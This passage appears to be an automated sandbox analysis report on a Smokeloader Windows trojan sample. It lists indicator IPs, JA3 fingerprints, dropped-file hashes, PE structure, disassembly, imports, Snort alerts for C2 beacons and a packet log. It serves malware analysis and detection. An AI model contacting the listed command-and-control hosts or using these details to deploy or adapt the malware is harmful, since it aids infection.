                file.exeGet hashmaliciousBrowse
                • 115.88.24.202
                file.exeGet hashmaliciousBrowse
                • 37.34.248.24
                file.exeGet hashmaliciousBrowse
                • 46.194.108.30
                file.exeGet hashmaliciousBrowse
                • 190.117.75.91
                file.exeGet hashmaliciousBrowse
                • 210.182.29.70

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                RTDBucharestRomaniaROfile.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                gm4I5PGtrj.elfGet hashmaliciousBrowse
                • 80.97.224.198
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                P4KNYxXtqa.elfGet hashmaliciousBrowse
                • 92.87.117.4
                file.exeGet hashmaliciousBrowse
                • 109.102.255.230
                file.exeGet hashmaliciousBrowse
                • 109.98.58.98
                SKB-ASSKBroadbandCoLtdKRfile.exeGet hashmaliciousBrowse
                • 211.59.14.90
                file.exeGet hashmaliciousBrowse
                • 211.59.14.90
                file.exeGet hashmaliciousBrowse
                • 175.120.254.9
                file.exeGet hashmaliciousBrowse
                • 58.235.189.192
                e0R5qxY8Vj.exeGet hashmaliciousBrowse
                • 175.120.81.189
                build[1].exe.0.exeGet hashmaliciousBrowse
                • 211.59.14.90
                rW84nlLvCG.exeGet hashmaliciousBrowse
                • 222.236.49.123
                ppXQe2rsJj.exeGet hashmaliciousBrowse
                • 222.232.238.243
                file.exeGet hashmaliciousBrowse
                • 175.120.254.9
                file.exeGet hashmaliciousBrowse
                • 58.235.189.192
                file.exeGet hashmaliciousBrowse
                • 58.235.189.192
                file.exeGet hashmaliciousBrowse
                • 58.235.189.192
                file.exeGet hashmaliciousBrowse
                • 175.120.254.9
                file.exeGet hashmaliciousBrowse
                • 175.119.10.231
                file.exeGet hashmaliciousBrowse
                • 175.120.254.9
                file.exeGet hashmaliciousBrowse
                • 175.119.10.231
                file.exeGet hashmaliciousBrowse
                • 58.235.189.192
                file.exeGet hashmaliciousBrowse
                • 222.232.238.243
                file.exeGet hashmaliciousBrowse
                • 58.235.189.192
                file.exeGet hashmaliciousBrowse
                • 175.119.10.231

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                a6fc491d6d097332f35d3ffaa4a31ecafd1b114cdccee.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                3KAVLD8qzP.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                KqLkCfSTy4.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                4b7af02af4ab2601c9006b3734bce41adf72f4f212765.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                order 64.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50
                file.exeGet hashmaliciousBrowse
                • 5.135.247.111
                • 87.250.250.50

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\Local\Temp\586.exefile.exeGet hashmaliciousBrowse

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\586.exe

                  Download File
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:modified
                  Size (bytes):610304
                  Entropy (8bit):7.634117495400957
                  Encrypted:false
                  SSDEEP:12288:3eTPj/Rtci/+NENuoP6nhZMtu5LNHyXfIf9Uk7fchd:3eTPjptci/2A6HaujGfIqqU
                  MD5:5C3FAFBD0E6546D41F902B129CE27E7B
                  SHA1:0D293C11B0F8D1CDB7457810B801B15F920858F9
                  SHA-256:EEF63539D65A5A8A2285B41A318B495AC283DF69519FBBFE14813B3990F7CFC2
                  SHA-512:B2536FCB569465A0B2826509CDEECC15052B4803414A2EEE40CA60299B71817E2565508C96BAB9E1E832F5C22438365AA87AF9481008EE64A4476677DC77BE4E
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Joe Sandbox View:
                  • Filename: file.exe, Detection: malicious, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2.a.2.a.2.a.,.....a.,...a.,....a..L..7.a.2.`...a.,..3.a.,...3.a.,..3.a.Rich2.a.................PE..L....</b.............................u............@.................................[J......................................t...<.... ..`Y...................... ... ...............................8T..@............................................text...<........................... ..`.data....r.......L..................@....rsrc...`Y... ...Z..................@..@.reloc... ......."..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\ichffhi

                  Download File
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):281600
                  Entropy (8bit):6.919008202366728
                  Encrypted:false
                  SSDEEP:3072:SXrv1Mdy3HldT80jg8o5/8R2wwmPKI0qt4G7bKlizcTfmFkyMQM/h3qpZa9uD6Vq:Sz1sy3lXNqwK1qDYi4QrwVfquS
                  MD5:28167CBFD672C0FC70358D19DE3826EB
                  SHA1:92112F7C9A68E28D86C3762871525647F55BB337
                  SHA-256:86533589ED7705B7BB28F85F19E45D9519023BCC53422F33D13B6023BAB7AB21
                  SHA-512:AA50669922C80477EE049A9C8EBE7F1D16BE7ACEAABDC4CA70889C53226A6759F04028D9AADD957AEC9D4C13672A0A2E0F70A59425FA4D117B042FDB1B6A22DF
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 44%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2.a.2.a.2.a.,.....a.,...a.,....a..L..7.a.2.`...a.,..3.a.,...3.a.,..3.a.Rich2.a.................PE..L.....Aa.............................u............@.........................................................................t...<.... ..`Y...................... ... ...............................8T..@............................................text...<........................... ..`.data....s.......L..................@....rsrc...`Y... ...Z..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\ichffhi:Zone.Identifier

                  Download File
                  Process:C:\Windows\explorer.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.919008202366728
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:281600
                  MD5:28167cbfd672c0fc70358d19de3826eb
                  SHA1:92112f7c9a68e28d86c3762871525647f55bb337
                  SHA256:86533589ed7705b7bb28f85f19e45d9519023bcc53422f33d13b6023bab7ab21
                  SHA512:aa50669922c80477ee049a9c8ebe7f1d16be7aceaabdc4ca70889c53226a6759f04028d9aadd957aec9d4c13672a0a2e0f70a59425fa4d117b042fdb1b6a22df
                  SSDEEP:3072:SXrv1Mdy3HldT80jg8o5/8R2wwmPKI0qt4G7bKlizcTfmFkyMQM/h3qpZa9uD6Vq:Sz1sy3lXNqwK1qDYi4QrwVfquS
                  TLSH:1454D0B17292C8B1C0012170441ADFD16B7EED3555649A533BA82B6E6EB338C66FB31F
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2.a.2.a.2.a.,.....a.,.....a.,.....a..L..7.a.2.`...a.,...3.a.,...3.a.,...3.a.Rich2.a.................PE..L.....Aa...........

                  File Icon

                  Icon Hash:8a9099a9ca8cd2f2

                  Static PE Info

                  General

                  Entrypoint:0x4075d0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6141E99F [Wed Sep 15 12:39:59 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:d432ab96c0953f4be1f6b5eda702e7f0

                  Entrypoint Preview

                  Instruction
                  call 00007F30A0B862AFh
                  jmp 00007F30A0B808ADh
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  mov ecx, dword ptr [esp+04h]
                  test ecx, 00000003h
                  je 00007F30A0B80A56h
                  mov al, byte ptr [ecx]
                  add ecx, 01h
                  test al, al
                  je 00007F30A0B80A80h
                  test ecx, 00000003h
                  jne 00007F30A0B80A21h
                  add eax, 00000000h
                  lea esp, dword ptr [esp+00000000h]
                  lea esp, dword ptr [esp+00000000h]
                  mov eax, dword ptr [ecx]
                  mov edx, 7EFEFEFFh
                  add edx, eax
                  xor eax, FFFFFFFFh
                  xor eax, edx
                  add ecx, 04h
                  test eax, 81010100h
                  je 00007F30A0B80A1Ah
                  mov eax, dword ptr [ecx-04h]
                  test al, al
                  je 00007F30A0B80A64h
                  test ah, ah
                  je 00007F30A0B80A56h
                  test eax, 00FF0000h
                  je 00007F30A0B80A45h
                  test eax, FF000000h
                  je 00007F30A0B80A34h
                  jmp 00007F30A0B809FFh
                  lea eax, dword ptr [ecx-01h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-02h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-03h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-04h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  sub esp, 20h
                  mov eax, dword ptr [ebp+08h]
                  push esi
                  push edi
                  push 00000008h
                  pop ecx
                  mov esi, 00401318h
                  lea edi, dword ptr [ebp-20h]
                  rep movsd
                  mov dword ptr [ebp-08h], eax
                  mov eax, dword ptr [ebp+0Ch]
                  pop edi
                  mov dword ptr [ebp-04h], eax
                  pop esi
                  test eax, eax
                  je 00007F30A0B80A3Eh
                  test byte ptr [eax], 00000008h

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2008 build 21022
                  • [ C ] VS2008 build 21022
                  • [C++] VS2008 build 21022
                  • [IMP] VS2005 build 50727
                  • [RES] VS2008 build 21022
                  • [LNK] VS2008 build 21022

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x187740x3c.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x320000x15960.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000xe20.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x54380x40.text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x1823c0x18400False0.5811855670103093data6.667356950011295IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0x1a0000x173b80x14c00False0.7738493034638554data6.92663614417821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x320000x159600x15a00False0.6664672145953757data6.760383698615715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x480000x1d9e0x1e00False0.40208333333333335data3.98004226626297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  KUNADOREHUMENANAMOVIZO0x456700x20eaASCII text, with very long lines (8426), with no line terminatorsFrenchSwitzerland
                  WOCIYIYAJETAFO0x44e980x7d1ASCII text, with very long lines (2001), with no line terminatorsFrenchSwitzerland
                  RT_ICON0x326600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x335080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x33db00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x343180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x368c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x379680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x382f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x387c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x396680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x39f100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x3a5d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x3ab400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x3d0e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x3e1900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x3e6600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x3f5080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x3fdb00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x404780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GeorgianGeorgia
                  RT_ICON0x409e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x42f880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x440300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GeorgianGeorgia
                  RT_ICON0x449b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GeorgianGeorgia
                  RT_GROUP_ICON0x387580x68dataGeorgianGeorgia
                  RT_GROUP_ICON0x3e5f80x68dataGeorgianGeorgia
                  RT_GROUP_ICON0x44e200x76dataGeorgianGeorgia
                  RT_VERSION0x477700x1ecdataFrenchSwitzerland
                  None0x477600xadataFrenchSwitzerland

                  Imports

                  DLLImport
                  KERNEL32.dllMoveFileExA, IsBadHugeReadPtr, SetEndOfFile, FindResourceExW, GetConsoleAliasExesLengthA, GetConsoleAliasA, InterlockedDecrement, HeapFree, SetVolumeMountPointW, SetThreadExecutionState, GetSystemDefaultLCID, ConvertFiberToThread, WaitNamedPipeW, SetCommTimeouts, EnumResourceTypesA, GlobalAlloc, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, GetFileAttributesA, DnsHostnameToComputerNameW, GetFileAttributesW, SetTimeZoneInformation, WriteConsoleW, GetGeoInfoA, GetBinaryTypeW, LCMapStringA, GetCPInfoExW, TlsGetValue, GetLastError, GetProcAddress, VirtualAlloc, SetComputerNameA, GlobalGetAtomNameA, LoadLibraryA, WriteConsoleA, LocalAlloc, GetFileType, WritePrivateProfileStringA, CreateEventW, AddAtomA, FoldStringA, FindNextFileA, SetConsoleCursorInfo, GetModuleHandleA, FindFirstChangeNotificationA, CreateMutexA, FindNextFileW, VirtualProtect, GetFileAttributesExW, SetFileShortNameA, GetVersion, SetFileValidData, EnumCalendarInfoExA, SetFileAttributesW, IsBadStringPtrW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, HeapAlloc, GetModuleHandleW, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, DeleteCriticalSection, SetFilePointer, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, ReadFile, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, SetStdHandle, FlushFileBuffers, HeapSize, MultiByteToWideChar, GetLocaleInfoA, GetStringTypeA, GetStringTypeW, LCMapStringW, GetProcessHeap, GetConsoleOutputCP
                  ADVAPI32.dllDeregisterEventSource

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  FrenchSwitzerland
                  GeorgianGeorgia

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.5123.213.233.19449727802039103 10/10/22-23:21:43.610588TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972780192.168.2.5123.213.233.194
                  192.168.2.5175.120.254.949725802851815 10/10/22-23:21:40.937240TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972580192.168.2.5175.120.254.9
                  192.168.2.5211.171.233.12649719802039103 10/10/22-23:21:33.465965TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971980192.168.2.5211.171.233.126
                  192.168.2.5123.213.233.19449707802039103 10/10/22-23:21:16.044111TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970780192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449708802851815 10/10/22-23:21:17.650942TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970880192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449710802851815 10/10/22-23:21:20.622915TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971080192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449712802039103 10/10/22-23:21:22.834033TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971280192.168.2.5123.213.233.194
                  192.168.2.5175.120.254.949715802039103 10/10/22-23:21:27.468192TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971580192.168.2.5175.120.254.9
                  192.168.2.5175.120.254.949718802039103 10/10/22-23:21:31.972645TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971880192.168.2.5175.120.254.9
                  192.168.2.5123.213.233.19449696802039103 10/10/22-23:20:42.553354TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969680192.168.2.5123.213.233.194
                  192.168.2.5195.158.3.16249697802851815 10/10/22-23:20:43.995908TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184969780192.168.2.5195.158.3.162
                  192.168.2.5211.171.233.12649701802039103 10/10/22-23:20:48.233145TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970180192.168.2.5211.171.233.126
                  192.168.2.5123.213.233.19449706802039103 10/10/22-23:21:14.135349TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970680192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449721802039103 10/10/22-23:21:36.299575TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972180192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449698802039103 10/10/22-23:20:44.841478TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969880192.168.2.5123.213.233.194
                  192.168.2.5211.171.233.12649700802851815 10/10/22-23:20:46.940023TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970080192.168.2.5211.171.233.126
                  192.168.2.5123.213.233.19449703802039103 10/10/22-23:20:51.020309TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970380192.168.2.5123.213.233.194
                  192.168.2.5185.95.186.5849705802039103 10/10/22-23:21:13.333100TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970580192.168.2.5185.95.186.58
                  192.168.2.5195.158.3.16249724802039103 10/10/22-23:21:40.109589TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972480192.168.2.5195.158.3.162
                  192.168.2.5195.158.3.16249699802039103 10/10/22-23:20:45.875779TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969980192.168.2.5195.158.3.162
                  192.168.2.5123.213.233.19449726802039103 10/10/22-23:21:42.125679TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972680192.168.2.5123.213.233.194
                  192.168.2.5109.102.255.23049720802039103 10/10/22-23:21:35.785955TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972080192.168.2.5109.102.255.230
                  192.168.2.5175.120.254.949729802039103 10/10/22-23:21:46.586226TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972980192.168.2.5175.120.254.9
                  192.168.2.5175.120.254.949702802851815 10/10/22-23:20:49.530167TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970280192.168.2.5175.120.254.9
                  192.168.2.5185.95.186.5849731802851815 10/10/22-23:21:49.526122TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973180192.168.2.5185.95.186.58
                  192.168.2.5123.213.233.19449708802039103 10/10/22-23:21:17.650942TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970880192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449712802851815 10/10/22-23:21:22.834033TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971280192.168.2.5123.213.233.194
                  192.168.2.5211.171.233.12649700802039103 10/10/22-23:20:46.940023TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970080192.168.2.5211.171.233.126
                  192.168.2.5175.120.254.949702802039103 10/10/22-23:20:49.530167TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970280192.168.2.5175.120.254.9
                  192.168.2.5175.120.254.949717802039103 10/10/22-23:21:30.478796TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971780192.168.2.5175.120.254.9
                  192.168.2.5123.213.233.19449728802039103 10/10/22-23:21:45.102166TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972880192.168.2.5123.213.233.194
                  192.168.2.5175.120.254.949695802039103 10/10/22-23:20:40.724773TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969580192.168.2.5175.120.254.9
                  192.168.2.5211.171.233.12949723802039103 10/10/22-23:21:38.968161TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972380192.168.2.5211.171.233.129
                  192.168.2.5185.95.186.5849731802039103 10/10/22-23:21:49.526122TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973180192.168.2.5185.95.186.58
                  192.168.2.5123.213.233.19449713802039103 10/10/22-23:21:24.328396TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971380192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449716802039103 10/10/22-23:21:28.975450TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971680192.168.2.5123.213.233.194
                  192.168.2.5175.120.254.949725802039103 10/10/22-23:21:40.937240TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972580192.168.2.5175.120.254.9
                  192.168.2.5123.213.233.19449721802851815 10/10/22-23:21:36.299575TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972180192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449709802039103 10/10/22-23:21:19.131381TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970980192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449722802039103 10/10/22-23:21:37.493453TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4972280192.168.2.5123.213.233.194
                  192.168.2.5211.171.233.12949714802039103 10/10/22-23:21:26.167962TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971480192.168.2.5211.171.233.129
                  192.168.2.5195.158.3.16249697802039103 10/10/22-23:20:43.995908TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969780192.168.2.5195.158.3.162
                  192.168.2.5123.213.233.19449703802851815 10/10/22-23:20:51.020309TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970380192.168.2.5123.213.233.194
                  192.168.2.5123.213.233.19449710802039103 10/10/22-23:21:20.622915TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971080192.168.2.5123.213.233.194

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 10, 2022 23:20:40.452744961 CEST4969580192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:40.720554113 CEST8049695175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:40.724355936 CEST4969580192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:40.724772930 CEST4969580192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:40.728177071 CEST4969580192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:40.995919943 CEST8049695175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:41.908329010 CEST8049695175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:41.908390999 CEST8049695175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:41.908469915 CEST4969580192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:41.908514023 CEST4969580192.168.2.5175.120.254.9
                  Oct 10, 2022 23:20:42.176136971 CEST8049695175.120.254.9192.168.2.5
                  Oct 10, 2022 23:20:42.281049967 CEST4969680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:42.552979946 CEST8049696123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:42.553282022 CEST4969680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:42.553354025 CEST4969680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:42.553417921 CEST4969680192.168.2.5123.213.233.194
                  Oct 10, 2022 23:20:42.825495958 CEST8049696123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:43.730217934 CEST8049696123.213.233.194192.168.2.5
                  Oct 10, 2022 23:20:43.730261087 CEST8049696123.213.233.194192.168.2.5
